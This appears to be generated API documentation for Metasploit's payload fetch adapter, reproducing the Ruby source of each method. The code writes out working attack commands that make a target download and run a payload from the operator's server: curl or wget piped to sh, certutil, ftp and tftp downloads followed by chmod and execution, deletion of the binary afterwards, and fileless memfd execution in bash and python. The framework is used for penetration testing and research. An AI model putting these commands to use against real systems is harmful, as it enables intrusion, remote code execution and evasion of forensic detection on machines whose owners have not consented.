Module: Msf::Payload::Adapter::Fetch

Included in:

HTTP, Https, SMB, TFTP

Defined in:

lib/msf/core/payload/adapter/fetch.rb

Defined Under Namespace

Modules: HTTP, Https, LinuxOptions, SMB, TFTP, WindowsOptions

Instance Method Summary

• #_check_tftp_file ⇒ Object
• #_check_tftp_port ⇒ Object
• #_determine_server_comm(ip, srv_comm = datastore['ListenerComm'].to_s) ⇒ Object

  copied from github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/socket_server.rb.

• #_download_pipe ⇒ Object
• #_execute_add(get_file_cmd) ⇒ Object
• #_execute_nix(get_file_cmd) ⇒ Object
• #_execute_win(get_file_cmd) ⇒ Object
• #_generate_certutil_command ⇒ Object
• #_generate_curl_command ⇒ Object
• #_generate_curl_pipe ⇒ Object
• #_generate_fileless(get_file_cmd) ⇒ Object

  The idea behind fileless execution are anonymous files.

• #_generate_fileless_python(get_file_cmd) ⇒ Object

  same idea as _generate_fileless function, but force creating anonymous file handle.

• #_generate_ftp_command ⇒ Object
• #_generate_tftp_command ⇒ Object
• #_generate_tnftp_command ⇒ Object
• #_generate_wget_command ⇒ Object
• #_generate_wget_pipe ⇒ Object
• #_remote_destination ⇒ Object
• #_remote_destination_nix ⇒ Object
• #_remote_destination_win ⇒ Object
• #default_srvuri(extra_data = nil) ⇒ Object

  If no fetch URL is provided, we generate one based off the underlying payload data This is because if we use a randomly-generated URI, the URI generated by venom and Framework will not match.

• #download_uri ⇒ Object
• #fetch_bindhost ⇒ Object
• #fetch_bindnetloc ⇒ Object
• #fetch_bindport ⇒ Object
• #generate(opts = {}) ⇒ Object
• #generate_fetch_commands ⇒ Object
• #generate_payload_uuid(conf = {}) ⇒ Object
• #generate_pipe_command ⇒ Object
• #generate_stage(opts = {}) ⇒ Object
• #handle_connection(conn, opts = {}) ⇒ Object
• #initialize(*args) ⇒ Object
• #linux? ⇒ Boolean
• #pipe_srvuri ⇒ Object
• #pipe_supported_binaries ⇒ Object
• #srvhost ⇒ Object
• #srvnetloc ⇒ Object
• #srvport ⇒ Object
• #srvuri ⇒ Object
• #windows? ⇒ Boolean

Instance Method Details

#_check_tftp_file ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 212

def _check_tftp_file
  # Older Linux tftp clients do not support saving the file under a different name
  unless datastore['FETCH_WRITABLE_DIR'].blank? && datastore['FETCH_FILENAME'].blank?
    print_error('The Linux TFTP client does not support saving a file under a different name than the URI.')
    fail_with(Msf::Module::Failure::BadConfig, 'FETCH_WRITABLE_DIR and FETCH_FILENAME must be blank when using the tftp client')
  end
end

#_check_tftp_port ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 204

def _check_tftp_port
  # Most tftp clients do not have configurable ports
  if datastore['FETCH_SRVPORT'] != 69 && datastore['FetchListenerBindPort'].blank?
    print_error('The TFTP client can only connect to port 69; to start the server on a different port use FetchListenerBindPort and redirect the connection.')
    fail_with(Msf::Module::Failure::BadConfig, 'FETCH_SRVPORT must be set to 69 when using the tftp client')
  end
end

#_determine_server_comm(ip, srv_comm = datastore['ListenerComm'].to_s) ⇒ Object

copied from github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/socket_server.rb

# File 'lib/msf/core/payload/adapter/fetch.rb', line 221

def _determine_server_comm(ip, srv_comm = datastore['ListenerComm'].to_s)
  comm = nil

  case srv_comm
  when 'local'
    comm = ::Rex::Socket::Comm::Local
  when /\A-?[0-9]+\Z/
    comm = framework.sessions.get(srv_comm.to_i)
    raise("Socket Server Comm (Session #{srv_comm}) does not exist") unless comm
    raise("Socket Server Comm (Session #{srv_comm}) does not implement Rex::Socket::Comm") unless comm.is_a? ::Rex::Socket::Comm
  when nil, ''
    unless ip.nil?
      comm = Rex::Socket::SwitchBoard.best_comm(ip)
    end
  else
    raise("SocketServer Comm '#{srv_comm}' is invalid")
  end

  comm || ::Rex::Socket::Comm::Local
end

#_download_pipe ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 70

def _download_pipe
  "#{srvnetloc}/#{@pipe_uri}"
end

#_execute_add(get_file_cmd) ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 242

def _execute_add(get_file_cmd)
  return _execute_win(get_file_cmd) if windows?

  return _execute_nix(get_file_cmd)
end

#_execute_nix(get_file_cmd) ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 254

def _execute_nix(get_file_cmd)
  return _generate_fileless(get_file_cmd) if datastore['FETCH_FILELESS'] == 'bash'
  return _generate_fileless_python(get_file_cmd) if datastore['FETCH_FILELESS'] == 'python3.8+'


  cmds = get_file_cmd
  cmds << ";chmod +x #{_remote_destination_nix}"
  cmds << ";#{_remote_destination_nix}&"
  cmds << "sleep #{rand(3..7)};rm -rf #{_remote_destination_nix}" if datastore['FETCH_DELETE']
  cmds
end

#_execute_win(get_file_cmd) ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 248

def _execute_win(get_file_cmd)
  cmds = " & start /B #{_remote_destination_win}"
  cmds << " & del #{_remote_destination_win}" if datastore['FETCH_DELETE']
  get_file_cmd << cmds
end

#_generate_certutil_command ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 266

def _generate_certutil_command
  case fetch_protocol
  when 'HTTP'
    get_file_cmd = "certutil -urlcache -f http://#{download_uri} #{_remote_destination}"
  when 'HTTPS'
    # I don't think there is a way to disable cert check in certutil....
    print_error('CERTUTIL binary does not support insecure mode')
    fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using CERTUTIL')
    get_file_cmd = "certutil -urlcache -f https://#{download_uri} #{_remote_destination}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  _execute_add(get_file_cmd)
end

#_generate_curl_command ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 312

def _generate_curl_command
  case fetch_protocol
  when 'HTTP'
    get_file_cmd = "curl -so #{_remote_destination} http://#{download_uri}"
  when 'HTTPS'
    get_file_cmd = "curl -sko #{_remote_destination} https://#{download_uri}"
  when 'TFTP'
    get_file_cmd = "curl -so #{_remote_destination} tftp://#{download_uri}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  _execute_add(get_file_cmd)
end

#_generate_curl_pipe ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 326

def _generate_curl_pipe
  execute_cmd = 'sh'
  execute_cmd = 'cmd' if windows?
  case fetch_protocol
  when 'HTTP'
    return "curl -s http://#{_download_pipe}|#{execute_cmd}"
  when 'HTTPS'
    return "curl -sk https://#{_download_pipe}|#{execute_cmd}"
  else
    fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
  end
end

#_generate_fileless(get_file_cmd) ⇒ Object

The idea behind fileless execution are anonymous files. The bash script will search through all processes owned by $USER and search from all file descriptor. If it will find anonymous file (contains “memfd”) with correct permissions (rwx), it will copy the payload into that descriptor with defined fetch command and finally call that descriptor

# File 'lib/msf/core/payload/adapter/fetch.rb', line 282

def _generate_fileless(get_file_cmd)
  # get list of all $USER's processes
  cmd = 'FOUND=0'
  cmd << ";for i in $(ps -u $USER | awk '{print $1}')"
  # already found anonymous file where we can write
  cmd << '; do if [ $FOUND -eq 0 ]'

  # look for every symbolic link with write rwx permissions
  # if found one, try to download payload into the anonymous file
  # and execute it
  cmd << '; then for f in $(find /proc/$i/fd -type l -perm u=rwx 2>/dev/null)'
  cmd << '; do if [ $(ls -al $f | grep -o "memfd" >/dev/null; echo $?) -eq "0" ]'
  cmd << "; then if $(#{get_file_cmd} >/dev/null)"
  cmd << '; then $f'
  cmd << '; FOUND=1'
  cmd << '; break'
  cmd << '; fi'
  cmd << '; fi'
  cmd << '; done'
  cmd << '; fi'
  cmd << '; done'

  cmd
end

#_generate_fileless_python(get_file_cmd) ⇒ Object

same idea as _generate_fileless function, but force creating anonymous file handle

# File 'lib/msf/core/payload/adapter/fetch.rb', line 308

def _generate_fileless_python(get_file_cmd)
  %Q<python3 -c 'import os;fd=os.memfd_create("",os.MFD_CLOEXEC);os.system(f"f=\\"/proc/{os.getpid()}/fd/{fd}\\";#{get_file_cmd};$f&")'> 
end

#_generate_ftp_command ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 339

def _generate_ftp_command
  case fetch_protocol
  when 'FTP'
    get_file_cmd = "ftp -Vo #{_remote_destination_nix} ftp://#{download_uri}"
  when 'HTTP'
    get_file_cmd = "ftp -Vo #{_remote_destination_nix} http://#{download_uri}"
  when 'HTTPS'
    get_file_cmd = "ftp -Vo #{_remote_destination_nix} https://#{download_uri}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  _execute_add(get_file_cmd)
end

#_generate_tftp_command ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 353

def _generate_tftp_command
  _check_tftp_port
  case fetch_protocol
  when 'TFTP'
    if windows?
      fetch_command = _execute_win("tftp -i #{srvhost} GET #{srvuri} #{_remote_destination}")
    else
      _check_tftp_file
      if datastore['FETCH_FILELESS'] != 'none' && linux?
        return _generate_fileless("(echo binary ; echo get #{srvuri} $f ) | tftp #{srvhost}")
      else
        fetch_command = "(echo binary ; echo get #{srvuri} ) | tftp #{srvhost}; chmod +x ./#{srvuri}; ./#{srvuri} &"
      end
    end
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  fetch_command
end

#_generate_tnftp_command ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 373

def _generate_tnftp_command
  case fetch_protocol
  when 'FTP'
    get_file_cmd = "tnftp -Vo #{_remote_destination_nix} ftp://#{download_uri}"
  when 'HTTP'
    get_file_cmd = "tnftp -Vo #{_remote_destination_nix} http://#{download_uri}"
  when 'HTTPS'
    get_file_cmd = "tnftp -Vo #{_remote_destination_nix} https://#{download_uri}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
  _execute_add(get_file_cmd)
end

#_generate_wget_command ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 387

def _generate_wget_command
  case fetch_protocol
  when 'HTTPS'
    get_file_cmd = "wget -qO #{_remote_destination} --no-check-certificate https://#{download_uri}"
  when 'HTTP'
    get_file_cmd = "wget -qO #{_remote_destination} http://#{download_uri}"
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end

  _execute_add(get_file_cmd)
end

#_generate_wget_pipe ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 400

def _generate_wget_pipe
  case fetch_protocol
  when 'HTTPS'
    return "wget --no-check-certificate -qO- https://#{_download_pipe}|sh"
  when 'HTTP'
    return "wget -qO- http://#{_download_pipe}|sh"
  else
    fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
  end
end

#_remote_destination ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 411

def _remote_destination
  return _remote_destination_win if windows?

  return _remote_destination_nix
end

#_remote_destination_nix ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 417

def _remote_destination_nix
  return @remote_destination_nix unless @remote_destination_nix.nil?

  if datastore['FETCH_FILELESS'] != 'none'
    @remote_destination_nix = '$f'
  else
    writable_dir = datastore['FETCH_WRITABLE_DIR']
    writable_dir = '.' if writable_dir.blank?
    writable_dir += '/' unless writable_dir[-1] == '/'
    payload_filename = datastore['FETCH_FILENAME']
    payload_filename = srvuri if payload_filename.blank?
    payload_path = writable_dir + payload_filename
    @remote_destination_nix = payload_path
  end
  @remote_destination_nix
end

#_remote_destination_win ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 434

def _remote_destination_win
  return @remote_destination_win unless @remote_destination_win.nil?

  writable_dir = datastore['FETCH_WRITABLE_DIR']
  writable_dir += '\\' unless writable_dir.blank? || writable_dir[-1] == '\\'
  payload_filename = datastore['FETCH_FILENAME']
  payload_filename = srvuri if payload_filename.blank?
  payload_path = writable_dir + payload_filename
  payload_path += '.exe' unless payload_path[-4..] == '.exe'
  @remote_destination_win = payload_path
  @remote_destination_win
end

#default_srvuri(extra_data = nil) ⇒ Object

If no fetch URL is provided, we generate one based off the underlying payload data This is because if we use a randomly-generated URI, the URI generated by venom and Framework will not match. This way, we can build a payload in venom and a listener in Framework, and if the underlying payload type/host/port are the same, the URI will be, too.

# File 'lib/msf/core/payload/adapter/fetch.rb', line 36

def default_srvuri(extra_data = nil)
  # If we're in framework, payload is in datastore; msfvenom has it in refname
  payload_name = datastore['payload'] ||= refname
  decoded_uri = payload_name.dup
  # there may be no transport, so leave the connection string off if that's the case
  netloc = ''
  if module_info['ConnectionType'].upcase == 'REVERSE' || module_info['ConnectionType'].upcase == 'TUNNEL'
    netloc << datastore['LHOST'] unless datastore['LHOST'].blank?
    unless datastore['LPORT'].blank?
      if Rex::Socket.is_ipv6?(netloc)
        netloc = "[#{netloc}]:#{datastore['LPORT']}"
      else
        netloc = "#{netloc}:#{datastore['LPORT']}"
      end
    end
  elsif module_info['ConnectionType'].upcase == 'BIND'
    netloc << datastore['LHOST'] unless datastore['LHOST'].blank?
    unless datastore['RPORT'].blank?
      if Rex::Socket.is_ipv6?(netloc)
        netloc = "[#{netloc}]:#{datastore['RPORT']}"
      else
        netloc = "#{netloc}:#{datastore['RPORT']}"
      end
    end
  end
  decoded_uri << ";#{netloc}"
  decoded_uri << ";#{extra_data}" unless extra_data.nil?
  Base64.urlsafe_encode64(OpenSSL::Digest::MD5.new(decoded_uri).digest, padding: false)
end

#download_uri ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 66

def download_uri
  "#{srvnetloc}/#{srvuri}"
end

#fetch_bindhost ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 74

def fetch_bindhost
  datastore['FetchListenerBindAddress'].blank? ? srvhost : datastore['FetchListenerBindAddress']
end

#fetch_bindnetloc ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 82

def fetch_bindnetloc
  Rex::Socket.to_authority(fetch_bindhost, fetch_bindport)
end

#fetch_bindport ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 78

def fetch_bindport
  datastore['FetchListenerBindPort'].blank? ? srvport : datastore['FetchListenerBindPort']
end

#generate(opts = {}) ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 92

def generate(opts = {})
  opts[:arch] ||= module_info['AdaptedArch']
  opts[:code] = super
  @srvexe = generate_payload_exe(opts)
  if datastore['FETCH_PIPE']
    unless pipe_supported_binaries.include?(datastore['FETCH_COMMAND'].upcase)
      fail_with(Msf::Module::Failure::BadConfig, "Unsupported binary selected for FETCH_PIPE option: #{datastore['FETCH_COMMAND']}, must be one of #{pipe_supported_binaries}.")
    end
    @pipe_cmd = generate_fetch_commands
    @pipe_cmd << "\n" if windows? #need CR when we pipe command in Windows
    vprint_status("Command served: #{@pipe_cmd}")
    cmd = generate_pipe_command
  else
    cmd = generate_fetch_commands
  end
  vprint_status("Command to run on remote host: #{cmd}")
  cmd
end

#generate_fetch_commands ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 125

def generate_fetch_commands
  # TODO: Make a check method that determines if we support a platform/server/command combination
  #
  case datastore['FETCH_COMMAND'].upcase
  when 'FTP'
    return _generate_ftp_command
  when 'TNFTP'
    return _generate_tnftp_command
  when 'WGET'
    return _generate_wget_command
  when 'CURL'
    return _generate_curl_command
  when 'TFTP'
    return _generate_tftp_command
  when 'CERTUTIL'
    return _generate_certutil_command
  else
    fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
  end
end

#generate_payload_uuid(conf = {}) ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 151

def generate_payload_uuid(conf = {})
  conf[:arch] ||= module_info['AdaptedArch']
  conf[:platform] ||= module_info['AdaptedPlatform']
  super
end

#generate_pipe_command ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 111

def generate_pipe_command
  # TODO: Make a check method that determines if we support a platform/server/command combination
  @pipe_uri = pipe_srvuri

  case datastore['FETCH_COMMAND'].upcase
  when 'WGET'
    return _generate_wget_pipe
  when 'CURL'
    return _generate_curl_pipe
  else
    fail_with(Msf::Module::Failure::BadConfig, "Unsupported binary selected for FETCH_PIPE option: #{datastore['FETCH_COMMAND']}, must be one of #{pipe_supported_binaries}.")
  end
end

#generate_stage(opts = {}) ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 146

def generate_stage(opts = {})
  opts[:arch] ||= module_info['AdaptedArch']
  super
end

#handle_connection(conn, opts = {}) ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 157

def handle_connection(conn, opts = {})
  opts[:arch] ||= module_info['AdaptedArch']
  super
end

#initialize(*args) ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 2

def initialize(*args)
  super
  register_options(
    [
      Msf::OptBool.new('FETCH_DELETE', [true, 'Attempt to delete the binary after execution', false]),
      Msf::OptPort.new('FETCH_SRVPORT', [true, 'Local port to use for serving payload', 8080]),
      # FETCH_SRVHOST defaults to LHOST, but if the payload doesn't connect back to Metasploit (e.g. adduser, messagebox, etc.) then FETCH_SRVHOST needs to be set
      Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ !options['LHOST']&.required, 'Local IP to use for serving payload']),
      Msf::OptString.new('FETCH_URIPATH', [ false, 'Local URI to use for serving payload', '']),
    ]
  )
  register_advanced_options(
    [
      Msf::OptAddress.new('FetchListenerBindAddress', [ false, 'The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST']),
      Msf::OptPort.new('FetchListenerBindPort', [false, 'The port to bind to if different from FETCH_SRVPORT']),
      Msf::OptBool.new('FetchHandlerDisable', [true, 'Disable fetch handler', false])
    ]
  )
  @fetch_service = nil
  @myresources = []
  @srvexe = ''
  @pipe_uri = nil
  @pipe_cmd = nil
  @remote_destination_win = nil
  @remote_destination_nix = nil
  @windows = nil
end

#linux? ⇒ Boolean

Returns:

• (Boolean)

# File 'lib/msf/core/payload/adapter/fetch.rb', line 197

def linux?
  return @linux unless @linux.nil?

  @linux = platform.platforms.first == Msf::Module::Platform::Linux
  @linux
end

#pipe_srvuri ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 184

def pipe_srvuri
  return datastore['FETCH_URIPATH'] unless datastore['FETCH_URIPATH'].blank?

  default_srvuri('pipe')
end

#pipe_supported_binaries ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 86

def pipe_supported_binaries
  # this is going to expand when we add psh support
  return %w[CURL] if windows?
  %w[WGET CURL]
end

#srvhost ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 162

def srvhost
  host = datastore['FETCH_SRVHOST']
  host = datastore['LHOST'] if host.blank?
  host = '127.127.127.127' if host.blank?
  host
end

#srvnetloc ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 169

def srvnetloc
  Rex::Socket.to_authority(srvhost, srvport)
end

#srvport ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 173

def srvport
  datastore['FETCH_SRVPORT']
end

#srvuri ⇒ Object

# File 'lib/msf/core/payload/adapter/fetch.rb', line 177

def srvuri
  # If the user has selected FETCH_PIPE, we save any user-defined uri for the pipe command
  return default_srvuri if datastore['FETCH_PIPE'] || datastore['FETCH_URIPATH'].blank?

  datastore['FETCH_URIPATH']
end

#windows? ⇒ Boolean

Returns:

• (Boolean)

# File 'lib/msf/core/payload/adapter/fetch.rb', line 190

def windows?
  return @windows unless @windows.nil?

  @windows = platform.platforms.first == Msf::Module::Platform::Windows
  @windows
end